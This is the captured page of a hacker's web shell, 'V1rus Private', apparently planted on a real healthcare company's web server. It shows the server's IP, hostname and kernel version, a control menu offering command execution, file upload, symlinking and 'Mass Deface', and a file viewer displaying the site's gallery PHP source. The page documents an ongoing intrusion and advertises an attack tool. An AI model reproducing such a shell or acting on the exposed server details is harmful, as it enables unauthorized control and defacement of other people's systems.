V1rus Private
User / IP
:
216.73.217.108
Host / Server
:
190.92.174.125 / aerosofthealthcare.com
System
:
Linux s3739.bom1.stableserver.net 4.18.0-513.24.1.lve.2.el8.x86_64 #1 SMP Fri May 24 12:42:50 UTC 2024 x86_64
Cmd
|
Upload
|
Mass Deface
|
Create
|
Sym
:
/
home
/
aerosoft
/
www
/
Viewing: gallery.php
<?php include 'header.php'; $sql = "SELECT * FROM gallery Orders LIMIT 1"; $res = $db->query($sql); $arr = array(); while ($row = $res->fetch_assoc()) { $arr[] = $row; } ?> <main> <div class="container"> <nav class="mt-2" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="#">Home</a></li> <li class="breadcrumb-item"><a href="#"> Gallery </a></li> </ol> </nav> <div class="row mt-4"> <?php $sql_projects = "SELECT * FROM gallery "; $res_projects = $db->query($sql_projects); $arr_projects = array(); while ($row_projects = $res_projects->fetch_assoc()) { $arr_projects[] = $row_projects; } if (is_array($arr_projects) && count($arr_projects) > 0) { foreach ($arr_projects as $row_projects) { ?> <div class="col-sm-3"> <a href="<?php echo $row_projects['link']; ?>"> <div class="box-img"> <img class="img-fluid img-thumbnail" src="./dashboard/gallery/<?php echo $row_projects['image']; ?>"> </div> </a> </div> <?php }} ?> </div> <?php include 'brands.php'; ?> </div> </main> <?php include 'footer.php'; ?>
Coded With 💗 by
HanzOFC